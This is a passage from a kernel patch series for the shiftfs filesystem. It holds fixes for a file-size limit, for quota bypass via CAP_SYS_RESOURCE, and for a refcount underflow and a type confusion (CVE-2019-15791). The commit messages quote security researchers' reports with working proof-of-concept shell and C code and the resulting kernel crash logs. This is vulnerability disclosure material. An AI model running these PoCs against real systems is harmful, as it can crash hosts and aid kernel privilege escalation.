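+   if (!realfile->f_op->mmap)
+     return -ENODEV;
+
+   vma->vm_file = get_file(realfile);   /* new reference for vm_file */
+   ret = call_mmap(vma->vm_file, vma);
+   if (ret) {
+     vma->vm_file = file;  /* restore the caller's value... */
+     fput(realfile);       /* ...and drop the reference we took */
+   } else {
+     fput(file);           /* vm_file no longer points at us */
+   }
+   return ret;
+ }
+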
+From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:22:28 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849482
+
+Set the s_maxbytes limit to MAX_LFS_FILESIZE.
+Currently shiftfs needlessly limits the maximum size for fallocate(),
+causing calls such as fallocate --length 2GB ./file to fail. This
+limitation is arbitrary since it's not caused by the underlay but
+rather by shiftfs itself capping the s_maxbytes. This causes bugs such
+as the one reported in [1].
+
+[1]: https://github.com/lxc/lxd/issues/6333
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 57d84479026b..6a2b5e3d0d53 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	inode->i_private = dentry->d_inode;
+ 
+ 	sb->s_magic = SHIFTFS_MAGIC;
++	sb->s_maxbytes = MAX_LFS_FILESIZE;
+ 	sb->s_op = &shiftfs_super_ops;
+ 	sb->s_xattr = shiftfs_xattr_handlers;
+ 	sb->s_d_op = &shiftfs_dentry_ops;
+-- 
+2.39.2
+
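+The failing call from the bug report, as a tiny reproducer (the path is
+hypothetical):
+
+ #include <fcntl.h>
+
+ int main(void)
+ {
+   int fd = open("/mnt/shiftfs/file", O_RDWR | O_CREAT, 0600);
+
+   if (fd < 0)
+     return 1;
+   /* Equivalent to: fallocate --length 2GB ./file -- this used to fail
+    * once the range crossed the capped s_maxbytes. */
+   return posix_fallocate(fd, 0, 2LL << 30) ? 1 : 0;
+ }
+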
+From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Wed, 23 Oct 2019 14:23:50 +0200
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
+ capabilities
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1849483
+
+Currently shiftfs allows exceeding project quota and reserved space on
+e.g. ext2. See [1] and especially [2] for a bug report. This is very
+much not what we want. Quotas and reserved space settings set on the
+host need to be respected. The cause for this issue is overriding the
+credentials with the superblock creator's credentials whenever we
+perform operations such as fallocate() or writes while retaining
+CAP_SYS_RESOURCE.
+
+The fix is to drop CAP_SYS_RESOURCE from the effective capability set
+after we have made a copy of the superblock creator's credential at
+superblock creation time. This very likely gives us more security than
+we had before and the regression potential seems limited. I would like
+to try this apporach first before coming up with something potentially
+more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
+limiting factor in most use-cases.
+
+[1]: https://github.com/lxc/lxd/issues/6333
+[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
+Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
+Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
+Acked-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 6a2b5e3d0d53..0d6ce377b07c 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 	sb->s_flags |= SB_POSIXACL;
+ 
+ 	if (sbinfo->mark) {
++		struct cred *cred_tmp;
+ 		struct super_block *lower_sb = path.mnt->mnt_sb;
+ 
+ 		/* to mark a mount point, must root wrt lower s_user_ns */
+@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
+ 			sbinfo->passthrough_mark = sbinfo->passthrough;
+ 		}
+ 
+-		sbinfo->creator_cred = prepare_creds();
+-		if (!sbinfo->creator_cred) {
++		cred_tmp = prepare_creds();
++		if (!cred_tmp) {
+ 			err = -ENOMEM;
+ 			goto out_put_path;
+ 		}
++		/* Don't override disk quota limits or use reserved space. */
++		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
++		sbinfo->creator_cred = cred_tmp;
+ 	} else {
+ 		/*
+ 		 * This leg executes if we're admin capable in the namespace,
+-- 
+2.39.2
+
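+The capability drop above, isolated as a helper (a sketch; shiftfs
+open-codes this at superblock creation time):
+
+ #include <linux/capability.h>
+ #include <linux/cred.h>
+
+ /*
+  * Copy the current credentials and lower CAP_SYS_RESOURCE so quota
+  * limits and reserved space on the host keep applying whenever these
+  * credentials are later assumed.
+  */
+ static struct cred *creds_without_sys_resource(void)
+ {
+   struct cred *cred = prepare_creds();
+
+   if (cred)
+     cap_lower(cred->cap_effective, CAP_SYS_RESOURCE);
+   return cred;
+ }
+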
+From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
+From: Seth Forshee <seth.forshee@canonical.com>
+Date: Fri, 1 Nov 2019 10:41:03 -0500
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
+ handling
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
+file from the lower filesystem without taking an additional
+reference to that file. After the btrfs ioctl completes this fd
+is closed, which then puts a reference to that file, leading to a
+refcount underflow. Original bug report and test case from Jann
+Horn is below.
+
+Fix this, and at the same time simplify the management of the fd
+to the lower file for the ioctl. In
+shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
+the lower file and set FDPUT_FPUT so that this reference will get
+dropped on fdput() in error paths. Do not maintain the struct fd
+in the caller, as it the fd installed in the fd table is
+sufficient to properly clean up. Finally, remove the fdput() in
+shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
+__close_fd() call.
+
+Original report from Jann Horn:
+
+In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
+
+ src = fdget(oldfd);
+ if (!src.file)
+  return -EINVAL;
+ // src holds one reference (assuming multithreaded execution)
+
+ ret = shiftfs_real_fdget(src.file, lfd);
+ // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
+ // extra references
+ fdput(src);
+ // this drops the only reference we were holding on src, and src was
+ // the only thing holding a reference to lfd->file. lfd->file may be
+ // dangling at this point.
+ if (ret)
+  return ret;
+
+ *newfd = get_unused_fd_flags(lfd->file->f_flags);
+ if (*newfd < 0) {
+  // always a no-op
+  fdput(*lfd);
+  return *newfd;
+ }
+
+ fd_install(*newfd, lfd->file);
+ // fd_install() consumes a counted reference, but we don't hold any
+ // counted references. so at this point, if lfd->file hasn't been freed
+ // yet, its refcount is one lower than it ought to be.
+
+ [...]
+
+ // the following code is refcount-neutral, so the refcount stays one too
+ // low.
+ if (ret)
+  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
+
+shiftfs_real_fdget() is implemented as follows:
+
+static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+{
+ struct shiftfs_file_info *file_info = file->private_data;
+ struct file *realfile = file_info->realfile;
+
+ lowerfd->flags = 0;
+ lowerfd->file = realfile;
+
+ /* Did the flags change since open? */
+ if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+  return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+ return 0;
+}
+
+Therefore, the following PoC will cause reference count overdecrements; I ran it
+with SLUB debugging enabled and got the following splat:
+
+=======================================
+user@ubuntu1910vm:~/shiftfs$ cat run.sh
+sync
+unshare -mUr ./run2.sh
+user@ubuntu1910vm:~/shiftfs$ cat run2.sh
+set -e
+
+mkdir -p mnt/tmpfs
+mkdir -p mnt/shiftfs
+mount -t tmpfs none mnt/tmpfs
+mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+mount|grep shift
+touch mnt/tmpfs/foo
+gcc -o ioctl ioctl.c -Wall
+./ioctl
+user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
+
+#include <err.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <unistd.h>
+#include <linux/btrfs.h>
+
+int main(void) {
+  int root = open("mnt/shiftfs", O_RDONLY);
+  if (root == -1) err(1, "open shiftfs root");
+  int foofd = openat(root, "foo", O_RDONLY);
+  if (foofd == -1) err(1, "open foofd");
+  struct btrfs_ioctl_vol_args iocarg = {
+    .fd = foofd
+  };
+  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+  sleep(1);
+  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
+  if (map != MAP_FAILED) munmap(map, 0x1000);
+}
+user@ubuntu1910vm:~/shiftfs$ ./run.sh
+none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+[ 183.463452] general protection fault: 0000 [#1] SMP PTI
+[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 183.510580] Call Trace:
+[ 183.511396] mmap_region+0x417/0x670
+[ 183.512592] do_mmap+0x3a8/0x580
+[ 183.513655] vm_mmap_pgoff+0xcb/0x120
+[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
+[ 183.516155] __x64_sys_mmap+0x33/0x40
+[ 183.517352] do_syscall_64+0x5a/0x130
+[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
+[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
+[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
+[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
+[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
+[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
+[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
+[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
+[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
+[ 183.560350] ---[ end trace 4a860910803657c2 ]---
+[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
+[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
+[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
+[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
+[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
+[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
+[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
+[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
+[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
+[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
+[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+=======================================
+
+Disassembly of surrounding code:
+
+55 push rbp
+4889E5 mov rbp,rsp
+4157 push r15
+4156 push r14
+4155 push r13
+4154 push r12
+488B87C8000000 mov rax,[rdi+0xc8]
+4C8B6810 mov r13,[rax+0x10]
+498B4528 mov rax,[r13+0x28]
+4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
+0F8497000000 jz near 0xcc
+4989FC mov r12,rdi
+4989F6 mov r14,rsi
+
+This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
+think this corresponds to the load of "realfile->f_op->mmap" in the source code.
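+
+A minimal illustrative sketch (not the shiftfs code itself): with slab
+poisoning enabled, kfree()d memory is filled with POISON_FREE (0x6b), so
+loading a pointer field from a freed object yields 0x6b6b6b6b6b6b6b6b -
+the value in RAX above - and the following dereference faults:
+
+ /* realfile points at an already-freed struct file */
+ const struct file_operations *fop = realfile->f_op; /* reads poison */
+ if (fop->mmap)                     /* GPF: fop == 0x6b6b6b6b6b6b6b6b */
+         ...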
+
+Reported-by: Jann Horn <jannh@google.com>
+Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
+
+CVE-2019-15791
+
+Acked-by: Tyler Hicks <tyhicks@canonical.com>
+Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
+Signed-off-by: Mike Pagano <mpagano@gentoo.org>
+---
+ fs/shiftfs.c | 35 +++++++++++++++++++++--------------
+ 1 file changed, 21 insertions(+), 14 deletions(-)
+
+diff --git a/fs/shiftfs.c b/fs/shiftfs.c
+index 0d6ce377b07c..9a6a7ad50b90 100644
+--- a/fs/shiftfs.c
++++ b/fs/shiftfs.c
+@@ -1389,8 +1389,7 @@ static inline bool is_btrfs_snap_ioctl(int cmd)
+ 	return false;
+ }
+ 
+-static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+-					  void __user *arg,
++static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args *v1,
+ 					  struct btrfs_ioctl_vol_args_v2 *v2)
+ {
+@@ -1404,7 +1403,6 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ 	else
+ 		ret = copy_to_user(arg, v2, sizeof(*v2));
+ 
+-	fdput(lfd);
+ 	__close_fd(current->files, fd);
+ 	kfree(v1);
+ 	kfree(v2);
+@@ -1415,11 +1413,11 @@ static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
+ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 					  struct btrfs_ioctl_vol_args **b1,
+ 					  struct btrfs_ioctl_vol_args_v2 **b2,
+-					  struct fd *lfd,
+ 					  int *newfd)
+ {
+ 	int oldfd, ret;
+ 	struct fd src;
++	struct fd lfd = {};
+ 	struct btrfs_ioctl_vol_args *v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
+ 
+@@ -1444,18 +1442,28 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	if (!src.file)
+ 		return -EINVAL;
+ 
+-	ret = shiftfs_real_fdget(src.file, lfd);
+-	fdput(src);
+-	if (ret)
++	ret = shiftfs_real_fdget(src.file, &lfd);
++	if (ret) {
++		fdput(src);
+ 		return ret;
++	}
++
++	/*
++	 * shiftfs_real_fdget() does not take a reference to lfd.file, so
++	 * take a reference here to offset the one which will be put by
++	 * __close_fd(), and make sure that reference is put on fdput(lfd).
++	 */
++	get_file(lfd.file);
++	lfd.flags |= FDPUT_FPUT;
++	fdput(src);
+ 
+-	*newfd = get_unused_fd_flags(lfd->file->f_flags);
++	*newfd = get_unused_fd_flags(lfd.file->f_flags);
+ 	if (*newfd < 0) {
+-		fdput(*lfd);
++		fdput(lfd);
+ 		return *newfd;
+ 	}
+ 
+-	fd_install(*newfd, lfd->file);
++	fd_install(*newfd, lfd.file);
+ 
+ 	if (cmd == BTRFS_IOC_SNAP_CREATE) {
+ 		v1->fd = *newfd;
+@@ -1468,7 +1476,7 @@ static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
+ 	}
+ 
+ 	if (ret)
+-		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
++		shiftfs_btrfs_ioctl_fd_restore(cmd, *newfd, arg, v1, v2);
+ 
+ 	return ret;
+ }
+@@ -1482,13 +1490,12 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	int newfd = -EBADF;
+ 	long err = 0, ret = 0;
+ 	void __user *argp = (void __user *)arg;
+-	struct fd btrfs_lfd = {};
+ 	struct super_block *sb = file->f_path.dentry->d_sb;
+ 	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
+ 	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
+ 
+ 	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
+-					     &btrfs_lfd, &newfd);
++					     &newfd);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -1511,7 +1518,7 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
+ 	fdput(lowerfd);
+ 
+ out_restore:
+-	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
++	err = shiftfs_btrfs_ioctl_fd_restore(cmd, newfd, argp,
+ 					     btrfs_v1, btrfs_v2);
+ 	if (!ret)
+ 		ret = err;
+-- 
+2.39.2
+
+From 187086d532fb6b5cb7785ebcb5438e170f136491 Mon Sep 17 00:00:00 2001
+From: Christian Brauner <christian.brauner@ubuntu.com>
+Date: Fri, 1 Nov 2019 14:19:16 +0100
+Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent type confusion
+Cc: mpagano@gentoo.org
+
+BugLink: https://bugs.launchpad.net/bugs/1850867
+
+Verify filesystem type in shiftfs_real_fdget().
+
+Quoting Jann Horn:
+ #################### Bug 2: Type confusion ####################
+
+ shiftfs_btrfs_ioctl_fd_replace() calls fdget(oldfd), then without further checks
+ passes the resulting file* into shiftfs_real_fdget(), which does this:
+
+ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
+ {
+  struct shiftfs_file_info *file_info = file->private_data;
+  struct file *realfile = file_info->realfile;
+
+  lowerfd->flags = 0;
+  lowerfd->file = realfile;
+
+  /* Did the flags change since open? */
+  if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
+   return shiftfs_change_flags(lowerfd->file, file->f_flags);
+
+  return 0;
+ }
+
+ file->private_data is a void* that points to a filesystem-dependent type; and
+ some filesystems even use it to store a type-cast number instead of a pointer.
+ The implicit cast to a "struct shiftfs_file_info *" can therefore be a bad cast.
+
+ As a PoC, here I'm causing a type confusion between struct shiftfs_file_info
+ (with ->realfile at offset 0x10) and struct mm_struct (with vmacache_seqnum at
+ offset 0x10), and I use that to cause a memory dereference somewhere around
+ 0x4242:
+
+ =======================================
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
+ #!/bin/sh
+ sync
+ unshare -mUr ./run2.sh
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
+ #!/bin/sh
+ set -e
+
+ mkdir -p mnt/tmpfs
+ mkdir -p mnt/shiftfs
+ mount -t tmpfs none mnt/tmpfs
+ mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
+ mount|grep shift
+ gcc -o ioctl ioctl.c -Wall
+ ./ioctl
+ user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
+ #include <sys/ioctl.h>
+ #include <fcntl.h>
+ #include <err.h>
+ #include <unistd.h>
+ #include <linux/btrfs.h>
+ #include <sys/mman.h>
+
+ int main(void) {
+   // make our vmacache sequence number something like 0x4242
+   for (int i=0; i<0x4242; i++) {
+     void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
+         MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
+     if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
+     munmap(x, 0x1000);
+   }
+
+   int root = open("mnt/shiftfs", O_RDONLY);
+   if (root == -1) err(1, "open shiftfs root");
+   int foofd = open("/proc/self/environ", O_RDONLY);
+   if (foofd == -1) err(1, "open foofd");
+   // trigger the confusion
+   struct btrfs_ioctl_vol_args iocarg = {
+     .fd = foofd
+   };
+   ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
+ }
+ user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
+ none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
+ /home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
+ [ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
+ [ 348.105060] #PF: supervisor read access in kernel mode
+ [ 348.106573] #PF: error_code(0x0000) - not-present page
+ [ 348.108102] PGD 0 P4D 0
+ [ 348.108871] Oops: 0000 [#1] SMP PTI
+ [ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
+ [ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
+ [ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+ [ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
+ [ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+ [ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+ [ 348.143545] Call Trace:
+ [ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
+ [ 348.145562] do_vfs_ioctl+0x407/0x670
+ [ 348.146620] ? putname+0x4a/0x50
+ [ 348.147556] ksys_ioctl+0x67/0x90
+ [ 348.148514] __x64_sys_ioctl+0x1a/0x20
+ [ 348.149593] do_syscall_64+0x5a/0x130
+ [ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
+ [ 348.152108] RIP: 0033:0x7f77fa76767b
+ [ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
+ [ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
+ [ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
+ [ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
+ [ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
+ [ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
+ [ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
+ [ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
+ [ 348.188617] CR2: 0000000000004289
+ [ 348.189586] ---[ end trace dad859a1db86d660 ]---
+ [ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
+ [ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
+ [ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
+ [ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
+ [ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
+ [ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
+ [ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
+ [ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
+ [ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
+ [ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
